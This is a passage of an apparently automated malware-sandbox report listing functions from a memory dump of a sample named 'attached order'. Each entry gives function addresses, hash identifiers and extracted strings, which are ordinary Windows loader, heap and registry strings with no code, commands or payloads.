                                                                                          • Instruction ID: 69cb9119891066b744eb0309e379d75a2164ad71d47e2a175581d757a6f7831d
                                                                                          • Opcode Fuzzy Hash: 27332cb181d377215de7d978d07392d05f79e7a729289f307d6fd7bd04642a83
                                                                                          • Instruction Fuzzy Hash: C971DE71A002059FEF26DF68D894ABEF7F0EB48708F14846DED06E7255E7B4AA41CB50
                                                                                          Function 0174096B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          • Opcode ID: 32f8b37b04e151f4bcf479b0a3ef0b24832d6a0c8a87baea8b916ed2ca5b827c
                                                                                          • Instruction ID: bcc126858f3e08066b28b499d16c46974dc52e3f7e4d9645fcc5713852d5b317
                                                                                          • Opcode Fuzzy Hash: 32f8b37b04e151f4bcf479b0a3ef0b24832d6a0c8a87baea8b916ed2ca5b827c
                                                                                          • Instruction Fuzzy Hash: A9619C717003019FDB2ACF28D884BA6FBE1FF44304F14859AEA898F296D770E955CB91
                                                                                          Function 0172CC68 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • @, xrefs: 0172CD03
                                                                                          • InstallLanguageFallback, xrefs: 0172CD1F
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0172CCD4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                          • API String ID: 0-1757540487
                                                                                          • Opcode ID: 56c73ed5cc40fc1173e38a1ae920bae3092043ee7196aa3a9c8151b62a306156
                                                                                          • Instruction ID: 2e86bc34b5fadd687267fe2a3be8979a33fcd893fdd9f0cdc2c867e081305f5d
                                                                                          • Opcode Fuzzy Hash: 56c73ed5cc40fc1173e38a1ae920bae3092043ee7196aa3a9c8151b62a306156
                                                                                          • Instruction Fuzzy Hash: 1F51D3765083129BD721EF68C444B6BF7E8BF98754F04092EFA89E3250EB34D945C7A2
                                                                                          Function 0176C640 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017A80F3
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 017A80E9
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 017A80E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          • Opcode ID: 4aa2a2f93fe91975765dde0a409637e5f3cbfdedb4b7372b994d414ca355dee2
                                                                                          • Instruction ID: efc58860a50a06647ebdb78b761e59579aa17337f1de19e886c3e31985c8bddd
                                                                                          • Opcode Fuzzy Hash: 4aa2a2f93fe91975765dde0a409637e5f3cbfdedb4b7372b994d414ca355dee2
                                                                                          • Instruction Fuzzy Hash: E741C171500311ABC732EF68E848B5BF7E8FB94710F14892AFD9893255EB74E9008B96
                                                                                          Function 017B43D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 017B4519
                                                                                          • LdrpCheckRedirection, xrefs: 017B450F
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4508
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-3154609507
                                                                                          • Opcode ID: 72efb5a98045e50217a9d425afc995cc37f2b3fab6842a4144c402d653fe2d46
                                                                                          • Instruction ID: 176be563261aeb03a2075b98d667e1aaac110cb1531d3b0fde606fa3f7eb7de0
                                                                                          • Opcode Fuzzy Hash: 72efb5a98045e50217a9d425afc995cc37f2b3fab6842a4144c402d653fe2d46
                                                                                          • Instruction Fuzzy Hash: 1541D3726046219FCB32CF5CD980BA6FBE4AF48650F0546A9FD4BD7257D734D8208B81
                                                                                          Function 01740ACE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          • Opcode ID: 44071f77db6cc8a3903a54582ba55a363f61199f117ced9955136593e2ac6fb5
                                                                                          • Instruction ID: 20196a45589cc2a6a62f9676f48a4270299184e8a616dd4cd38672d50c1811dd
                                                                                          • Opcode Fuzzy Hash: 44071f77db6cc8a3903a54582ba55a363f61199f117ced9955136593e2ac6fb5
                                                                                          • Instruction Fuzzy Hash: E51103B1359512DFDB2ACA28D498FBAF3A5FF80610F1885AAF506CB245DB30D945CB80
                                                                                          Function 0173A8F0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrResSearchResource Enter, xrefs: 0173A933
                                                                                          • LdrResSearchResource Exit, xrefs: 0173A945
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          • API String ID: 0-4066393604
                                                                                          • Opcode ID: 4ca282854412571a67889b96c7c7a8f325d03ffd04393ec3db86a32f1b0cb62c
                                                                                          • Instruction ID: 5b49e54243d2b68e9b5694acb5484b01483420918d257269aecc8a989ea98e7c
                                                                                          • Opcode Fuzzy Hash: 4ca282854412571a67889b96c7c7a8f325d03ffd04393ec3db86a32f1b0cb62c
                                                                                          • Instruction Fuzzy Hash: 7FE1B472E00249AFEF26DFA9D985BADFBB9BF84300F104069E941E7252D734D945CB50
                                                                                          Function 017AE372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          • Opcode ID: aafa614f1b3bd2f656a34bb55004efad3e5bcdffc00002c48b1b6ae267bd8914
                                                                                          • Instruction ID: 5b347d2a8b9e909b9bb4b65810c851d639dfdcf2a1868f38d6b342fa9e7b4733
                                                                                          • Opcode Fuzzy Hash: aafa614f1b3bd2f656a34bb55004efad3e5bcdffc00002c48b1b6ae267bd8914
                                                                                          • Instruction Fuzzy Hash: 5B616C71A403099FDB25DFA8C840AADFBB9FB84700F64456DE649EB251EB30E940CB60
                                                                                          Function 0173AB70 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 0173AB9C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 0173AB8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          • API String ID: 0-1497657909
                                                                                          • Opcode ID: 00b574579943e06422c4c9d7e1a7f587074c243efe52fd77754eb8146fa25d45
                                                                                          • Instruction ID: 061206eaf463dccfd55259e565b7577f1a1e903f7b2dadd360cb8cc7a4c01df1
                                                                                          • Opcode Fuzzy Hash: 00b574579943e06422c4c9d7e1a7f587074c243efe52fd77754eb8146fa25d45
                                                                                          • Instruction Fuzzy Hash: AC61DE71A046499FEF16CFACD881BAAFBB5FF94700F140469E941EB292E774D940CB60
                                                                                          Function 01764B79 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          • API String ID: 0-758220159
                                                                                          • Opcode ID: e3bcf34fcf58b256c963831d2bc7a354ec9d4784e29d0aa6e0624110b661339c
                                                                                          • Instruction ID: ce259d3a325015776a14332a9d733c229a89ab6f9e7b3f68df8288d8b44b61f4
                                                                                          • Opcode Fuzzy Hash: e3bcf34fcf58b256c963831d2bc7a354ec9d4784e29d0aa6e0624110b661339c
                                                                                          • Instruction Fuzzy Hash: 38518AB1E006488FDF26DF99C484769FBF8FF44715F54C16AD84A9B249E7709981CB80
                                                                                          Function 01730485 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • kLsE, xrefs: 017305FE
                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01730586
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                          • API String ID: 0-2547482624
                                                                                          • Opcode ID: 9acfdce7e7ad3a57db6fbf81c2c707129d5f13448538b193cb89ccbf8819c41a
                                                                                          • Instruction ID: bc91d70e86bec11d5694a686e49b85e3ddab5d0d518ca2c4d3da519f54594292
                                                                                          • Opcode Fuzzy Hash: 9acfdce7e7ad3a57db6fbf81c2c707129d5f13448538b193cb89ccbf8819c41a
                                                                                          • Instruction Fuzzy Hash: 2951D571A00746DFDB25DFA8C444AABF7F4AF84300F20857EE696C3282E7749644CB62
                                                                                          Function 01762DBC Relevance: 2.6, Strings: 2, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 017A2611
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 017A2616
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          • API String ID: 0-2104531740
                                                                                          • Opcode ID: afc38710222fc4124c6bd197627df78297fd58ae6d6bf0e62857a1a95f9c89f2
                                                                                          • Instruction ID: 3f4d2403f53e12a777f294febb18aaac17928a38f8b388bdc7b911a9df5b99cd
                                                                                          • Opcode Fuzzy Hash: afc38710222fc4124c6bd197627df78297fd58ae6d6bf0e62857a1a95f9c89f2
                                                                                          • Instruction Fuzzy Hash: C241E372600211EBD728CF49C894A7AF7B9FFD8710F6481ADEA959B646E730DC41CB90
                                                                                          Function 0173A1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A229
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A21B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          • API String ID: 0-2876891731
                                                                                          • Opcode ID: d2fce7683c9c90042feda93d03379042cc27dd1825481c9292ea3baed6ef779e
                                                                                          • Instruction ID: c9bbb8e3bd0ee28d73807394985f4d9e86935d2d630398aed802c203d2266913
                                                                                          • Opcode Fuzzy Hash: d2fce7683c9c90042feda93d03379042cc27dd1825481c9292ea3baed6ef779e
                                                                                          • Instruction Fuzzy Hash: 3941FF30A08615EBEB11DFA9D845B69FBB4FFC5750F1440A5ED84EB2A2E336D900CB00
                                                                                          Function 0176A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                          • API String ID: 2994545307-4008356553
                                                                                          • Opcode ID: 0b6e174bb3b2b6c26976bb62b755e240ff9d049737abc32086f48709a9c10859
                                                                                          • Instruction ID: 24ad692c14c83da13f26c1831c18eb81d5278e65efbdc883b467d085756fd751
                                                                                          • Opcode Fuzzy Hash: 0b6e174bb3b2b6c26976bb62b755e240ff9d049737abc32086f48709a9c10859
                                                                                          • Instruction Fuzzy Hash: 9201F4B2250740EFD322DF24CD09B12B7E8EB40B15F108939EA58D75A1E734DA00CB45
                                                                                          Function 0173C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          • API String ID: 0-1339004836
                                                                                          • Opcode ID: 53d12c4c8b533126c83a7efe19b743aae96e3b18c78f5b7b782d7ad900c7edc2
                                                                                          • Instruction ID: 21fe5a3e33b37dc5374bb9383f50884f18d3e6450d9595366f4348f7e2bcf090
                                                                                          • Opcode Fuzzy Hash: 53d12c4c8b533126c83a7efe19b743aae96e3b18c78f5b7b782d7ad900c7edc2
                                                                                          • Instruction Fuzzy Hash: AF825B75E002198FEB25CFA9C8847EDFBB5BF88710F14816AE959AB252D7309D81CB50
                                                                                          Function 017CC7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          • Opcode ID: 0a0aad803f6e32e0f149d949a086750f9bdb1e1973724c23ba857c50fdad168f
                                                                                          • Instruction ID: 678dd32f11ffbd01d05fb09f6e6ba081ad1989c0a18bcf27eb2b0f85bbb17704
                                                                                          • Opcode Fuzzy Hash: 0a0aad803f6e32e0f149d949a086750f9bdb1e1973724c23ba857c50fdad168f
                                                                                          • Instruction Fuzzy Hash: EDD1AE30900216ABDB26CF58C481ABFFBF1FF44B14F14849EE8999B241E735E991D790
                                                                                          Function 017B60A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          • Opcode ID: d913bda3dea03a45a9d0d6545be00582187d1d5da94b3d7b29cbb49e3834f7e1
                                                                                          • Instruction ID: 70521b1ff647ab31ccef6ffce4ca2fdd84a7e94a8335a91d35d43cefec909a2a
                                                                                          • Opcode Fuzzy Hash: d913bda3dea03a45a9d0d6545be00582187d1d5da94b3d7b29cbb49e3834f7e1
                                                                                          • Instruction Fuzzy Hash: 65915072A01619ABEB21DB99CD85FEEFBB8EF04750F100059F700AB295D774A900CBA4
                                                                                          Function 0176A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          • Opcode ID: 068d1d5ddba559027811ab52257785de4668bb7ccca7329d319d5a2a73c0f5dd
                                                                                          • Instruction ID: f4965ecd617e88d6f8c6d71486b682d5fc81659c88d1a51f2323e67cca279a9f
                                                                                          • Opcode Fuzzy Hash: 068d1d5ddba559027811ab52257785de4668bb7ccca7329d319d5a2a73c0f5dd
                                                                                          • Instruction Fuzzy Hash: 85717D75E0020ADFDF28CF9CC5906ADFBB2BF98710F68826AF945A7245E7718941CB50
                                                                                          Function 017402F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #%u
                                                                                          • API String ID: 0-232158463
                                                                                          • Opcode ID: db0f110690753b468e9efb8f7f4421ac081b393ad1c282d7fed2b196d2ce2ce8
                                                                                          • Instruction ID: 42d7d6dfaa18bf5be8db696490f9072cce522317162a41793fc553236e28aad2
                                                                                          • Opcode Fuzzy Hash: db0f110690753b468e9efb8f7f4421ac081b393ad1c282d7fed2b196d2ce2ce8
                                                                                          • Instruction Fuzzy Hash: 2D716771A0010A9FDF01DFA8D994BAEFBF8EF18704F140069EA05E7255EB34E945CBA0
                                                                                          Function 0174E547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EXT-
                                                                                          • API String ID: 0-1948896318
                                                                                          • Opcode ID: 385b40cfe7cfeb4772798af4452602541aa42f3e1411b6a85f098a6ea16990c8
                                                                                          • Instruction ID: dfe999d5f08a6d5305bb0b98d7cd7994049d990cb108481ba9c0d81a58c08815
                                                                                          • Opcode Fuzzy Hash: 385b40cfe7cfeb4772798af4452602541aa42f3e1411b6a85f098a6ea16990c8
                                                                                          • Instruction Fuzzy Hash: 86417F725193129BD721DA65C848F6FF7E8BF88724F440A2DF684E7180EB78D9048797
                                                                                          Function 0172CD8A Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AlternateCodePage
                                                                                          • API String ID: 0-3889302423
                                                                                          • Opcode ID: d9f34bf582018932d524e1b9fa4f181f9e7b4e0dd4f859b25204dc9fed06d6d7
                                                                                          • Instruction ID: 9f5d3d063a82eb1a7edc823efb3248e2d925c5369e4cc4d90ad3f4ba8f10fb8f
                                                                                          • Opcode Fuzzy Hash: d9f34bf582018932d524e1b9fa4f181f9e7b4e0dd4f859b25204dc9fed06d6d7
                                                                                          • Instruction Fuzzy Hash: 6041E072D40219ABDF25EB98CC84AEEFBB8FF94310F14416AE511B3654E7709B81CB90
                                                                                          Function 017641BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                          • Instruction ID: 88ddd0d698905e9a03399c8ce6d85d8d99e38c10d4fc7f6ab2ab1657b2e8d06f
                                                                                          • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                          • Instruction Fuzzy Hash: 34518C715047119FC321DF29C844A67FBE8FF48710F008A2EFA9697650E774E954CB91
                                                                                          Function 017BCB20 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          • Opcode ID: 7ecc1187365d0953bb8cfa94226d6851244cd25fd83f044d0379da1fceda07e2
                                                                                          • Instruction ID: e5c3cbc21bab8f5b0e9acbb0715fc71ba5faae5d2fac6f2be37fda0366900698
                                                                                          • Opcode Fuzzy Hash: 7ecc1187365d0953bb8cfa94226d6851244cd25fd83f044d0379da1fceda07e2
                                                                                          • Instruction Fuzzy Hash: 7041A1719402199FDB22DF99D884BAEFBB8FF24B00F10812AE955DB359E774C941CB50
                                                                                          Function 017EADD6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PreferredUILanguages
                                                                                          • API String ID: 0-1884656846
                                                                                          • Opcode ID: cf6fe8b4c1fa40aac56f29c8701a66f71364ff60a2ce94611fb595bdc74145ad
                                                                                          • Instruction ID: ced12ec4c2d12cf0467896575128a9b5999128d755cc796270ea16ec7bc34a8b
                                                                                          • Opcode Fuzzy Hash: cf6fe8b4c1fa40aac56f29c8701a66f71364ff60a2ce94611fb595bdc74145ad
                                                                                          • Instruction Fuzzy Hash: 6D419472D00219ABDF21DB98C848FEEF7F9EF58750F05416AEA01A7294E674DE41C7A0
                                                                                          Function 017AC3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          • API String ID: 0-2202222882
                                                                                          • Opcode ID: b9b997d1b19f42711aff808ac611de970aefaba0bdaa14a420852e8142fb089c
                                                                                          • Instruction ID: 6ce91938d6509609e2dff5e754176f434ab5af09af47c60e3a77c5e7b7014e3c
                                                                                          • Opcode Fuzzy Hash: b9b997d1b19f42711aff808ac611de970aefaba0bdaa14a420852e8142fb089c
                                                                                          • Instruction Fuzzy Hash: A84147B190052DABDF22DA50CC84FDEF77CAB54714F5045E5EB08A7145DB309E888FA5
                                                                                          Function 017D6BDE Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kLsE
                                                                                          • API String ID: 0-3058123920
                                                                                          • Opcode ID: 8cd25e42b8f4afc1a05aa20997578905858ab828244b196cee75de601dcb6d32
                                                                                          • Instruction ID: c48e60c154230a5329365a9db5a38402e1dff887119916fc0fa74130b8868ff1
                                                                                          • Opcode Fuzzy Hash: 8cd25e42b8f4afc1a05aa20997578905858ab828244b196cee75de601dcb6d32
                                                                                          • Instruction Fuzzy Hash: 71412B3150135A87E732EF78E888765BFA0EB50724F348119FE544A1CAEB7466C5CFA1
                                                                                          Function 017AC920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          • API String ID: 0-565535830
                                                                                          • Opcode ID: 9b0a95aaad32277ad34579c59eed08e35fbeea1450033784592ab426ac6df97c
                                                                                          • Instruction ID: 703faf698d1af8e624a85bbeb324609389dc64a02a4acf97d6423f77208fa1c8
                                                                                          • Opcode Fuzzy Hash: 9b0a95aaad32277ad34579c59eed08e35fbeea1450033784592ab426ac6df97c
                                                                                          • Instruction Fuzzy Hash: BA318F7294061ABBDB26DB98CC55FAEFBB8EB54650F400169FA00EB250D770DE41CB90
